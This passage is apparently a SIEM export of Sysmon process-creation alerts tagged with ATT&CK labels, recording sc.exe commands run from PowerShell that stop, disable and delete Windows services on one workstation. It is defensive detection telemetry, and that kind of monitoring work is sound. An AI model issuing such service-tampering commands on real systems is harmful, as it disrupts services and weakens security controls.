Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.092",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.872 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-0010288a3000} +ProcessId: 6676 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHelp64 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHelp64 Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.873980100Z"",""eventRecordID"":""3798"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.872\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-0010288a3000}\r\nProcessId: 6676\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHelp64 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.872"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-0010288a3000}"",""processId"":""6676"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHelp64 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.061",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.809 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-0010ca873000} +ProcessId: 4508 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.811913200Z"",""eventRecordID"":""3796"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.809\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-0010ca873000}\r\nProcessId: 4508\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:34.809"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-0010ca873000}"",""processId"":""4508"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.388",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.615 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-0010eb823000} +ProcessId: 5936 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.622022500Z"",""eventRecordID"":""3793"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.615\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-0010eb823000}\r\nProcessId: 5936\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.615"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-0010eb823000}"",""processId"":""5936"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.358",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.494 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-0010a2803000} +ProcessId: 7488 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 
Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.498751200Z"",""eventRecordID"":""3791"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.494\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-0010a2803000}\r\nProcessId: 7488\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.494"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-0010a2803000}"",""processId"":""7488"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.342",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.452 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-0010c57f3000} +ProcessId: 1988 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.466241300Z"",""eventRecordID"":""3790"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.452\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-0010c57f3000}\r\nProcessId: 1988\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.452"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-0010c57f3000}"",""processId"":""1988"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.285",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:52:34.208 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-00108e7c3000} +ProcessId: 6112 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.220338200Z"",""eventRecordID"":""3787"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.208\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-00108e7c3000}\r\nProcessId: 6112\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.208"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-00108e7c3000}"",""processId"":""6112"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
